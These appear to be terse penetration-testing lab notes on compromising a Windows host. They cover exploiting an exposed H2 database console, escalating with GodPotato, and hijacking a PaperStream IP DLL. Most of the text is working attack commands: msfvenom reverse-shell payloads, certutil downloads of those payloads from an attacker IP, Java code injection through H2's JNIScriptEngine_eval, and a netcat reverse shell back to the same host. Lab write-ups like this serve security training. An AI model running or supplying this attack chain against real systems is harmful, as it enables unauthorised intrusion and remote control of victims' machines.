We discover port 80
We can change password with the api on this JDBC
We are presented with H2 console:
We can change the database to something that doesn't exist and check:
User tony found
We can try an exploit:
https://www.exploit-db.com/exploits/49384
We got working code execution.
Now we can create a shell:
msfvenom -p windows/x64/shell_reverse_tcp LHOST=192.168.45.236 LPORT=1234 -f exe > reverse.exe
now we can transfer this with:
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -f http://192.168.45.236/reverse.exe C:/Users/Public/reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
Now to get the reverse shell back:
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("C:/Users/Public/reverse.exe").getInputStream()).useDelimiter("\\Z").next()');
Nothing works
Using full path:
C:\Windows\system32\whoami.exe /priv
We can also set the path:
set PATH=%PATH%C:\Windows\System32;C:\Windows\System32\WindowsPowerShell\v1.0;
We have SeImpersonatePrivilege so trying Godpotato:
.\GodPotato.exe -cmd "C:\Users\Public\nc64.exe -t -e C:\Windows\System32\cmd.exe 192.168.45.236 9092"
We get a shell but it is a broken shell.
We find an unusual program:
Using the exploit for PaperStream IP
https://www.exploit-db.com/exploits/49382
Now generate msfvenom payload:
msfvenom -p windows/x64/shell_reverse_tcp -f dll -o shell.dll LHOST=192.168.45.236 LPORT=9092
Transfer it to the machine:
certutil -urlcache -f http://192.168.45.236/shell.dll C:\Windows\Temp\UninOldIS.dll
Now run exploit:
.\paper.ps1